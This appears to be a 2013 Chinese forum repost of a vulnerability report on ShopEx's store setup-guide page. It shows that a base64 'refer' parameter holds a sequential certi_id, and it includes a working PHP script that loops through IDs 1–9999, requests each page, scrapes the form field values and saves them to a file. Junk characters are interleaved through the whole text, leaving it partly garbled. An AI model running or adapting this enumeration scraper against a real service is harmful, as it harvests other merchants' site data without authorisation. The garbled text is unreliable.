|
|
简要描述:
9 W4 w4 k5 X& K" Y- L4 Q/ \ShopEx某接口缺陷,可遍历所有网站
. C& t2 ?% z4 V1 Z5 w9 {2 h详细说明:
: U) g$ f. Q+ T1 g* M问题出现在shopex 网店使用向导页面 . d$ l6 I V3 k2 N- o- O+ s
" u) \5 ^. V7 P
$ r; f4 @3 a8 F( y( R7 ]8 N# i2 i9 e' Q3 k2 v; I
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=# b1 ]) n9 `$ P1 b
0 ~8 S3 Z. b/ w
2 m2 z w5 O6 [; z* w, }* J- M0 Z) o+ C% W1 [0 K: |/ p! ~
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}' g9 f2 H" r' `7 h$ \
- w# E" f9 N9 d2 |6 R9 K3 ^0 \4 M+ Y
3 l% A' g; p% a我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 ( _8 u% P- O' f, ]: T B- u
7 ~# l2 _( K6 C4 ]6 L- J
+ F) Y% m7 ^8 t5 Z6 X1 ^2 r9 _4 o( a. y: y3 t" n3 R, X
<?php
|2 i& J; m Q, h: E
- @7 q! ~3 B0 k1 [ for ($i=1; $i < 10000; $i++) { //遍历6 q3 z* d, [% R3 x, u( F2 o
! M" m' A; @* e" } ShowshopExD($i);' e& k, U; o2 u/ n8 `+ w
. P4 a! F5 K$ t }# j4 _3 a, w. W- L h
U1 y+ R: \3 [% {: }" m, Z Y
function ShowshopExD($cid) {. |- \' o& I) M
3 }8 f7 E3 y0 \3 e5 f5 b' L8 v$ e $url='http://guide.ecos.shopex.cn/step2.php';, i; U n, }) u
! ~* Q+ j' u7 \2 s3 h8 Q
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
Y7 \8 |4 A2 p) n% y2 b, {/ Y* t9 q: q) V, D: @5 B
$url = $url.'?refer='.$refer;
- i3 V$ Y5 s( D% u4 ]8 `7 N3 Z% b- L7 N* |4 S2 s
$ch = curl_init($url);
+ Y6 U- b- i% @- R6 p4 j7 l5 |. C+ r9 j0 R- d0 m" t
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;5 H9 n, }3 I8 V. o% z
" _' }) t( {, y1 Q2 A
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;: }: p8 W1 r8 h
4 a/ s- e) a$ W) Y7 U; Z $result = curl_exec($ch);
5 @) I. I# T7 \ w. U8 |% Y* `5 l1 O
6 J# ?, C" s, E1 I9 f $result = mb_convert_encoding($result, "gb2312", "UTF-8");
2 J' L# K. Z/ K" q) s1 U+ W
4 K8 \; {2 F4 d. t0 d- ~. {% N if(strpos($result,$refer))
) R, r/ ^% G) D
& W3 h' j# f. T# U/ Y% ~ {
8 `$ F1 o' b9 v7 q; h7 M; J. c
# d! L3 t4 h/ ^) Q, [ $fp = fopen("c:/shopEx.txt",'ab'); //保存文件0 c) a" l8 r5 g9 d) n) A6 B
3 e1 }% W: c) V; A; `
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);; z, X# \# r; V# P8 q" Z+ ^$ G
2 e2 L/ F. n! r foreach ($value[1] as $key) {( {1 Q- @$ Z. ^2 n9 a- K4 G
" O; p4 F- j ?8 S. } preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
/ U$ P8 f! ?1 o6 k( G6 a. p6 Z7 U: c3 V0 E& G: |3 ?% p7 m% q( A6 a
echo $res[1][0].':'.$res[3][0]."\r\n";( v2 Y0 T6 s1 f# J
. J# _9 `# a, R% [9 k6 t! @; ~ $col =$res[1][0].':'.$res[3][0]."\r\n";
6 a# S$ J/ W9 o }* q' s6 N% K
8 e- ]) c) c6 Y) Y2 y fwrite($fp, $col, strlen($col)); . @- e7 Y8 [( ]+ L- N f
2 k& l- L6 ~- ^; o }
8 {0 G d- @0 _6 t6 z& J, S9 n% t3 ]* \0 {! `' \. ~/ Z
echo '--------------------------------'."\r\n";
3 d4 h$ i: R, d
( D/ j/ {* w% i8 p; f# E fclose($fp); ) z- ] v# G3 ~5 h& j- \$ q
& ?+ V- U0 o& R }
0 N( e6 w& d4 Z1 Q: b. Y" Z4 ^! V1 m! L
flush();
7 Z' Y% A9 Z' R. D$ Z3 ^8 R' u, T. D; H c: J: z9 m
curl_close($ch);1 h% X# i6 x( @% h! y
. Q. K2 ^0 J* `9 ]8 X
}
8 [+ Y, n# J7 G# {2 m: ~9 L* f" |! C4 k1 p; R; P
?>) O) U. [0 s0 N' O7 @
漏洞证明:
- ~* V+ c7 v# A7 thttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg. l4 |7 D0 i3 J9 z( I3 c: A( L' b
refer换成其他加密方式
* E% U# d! s/ x; j" e |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对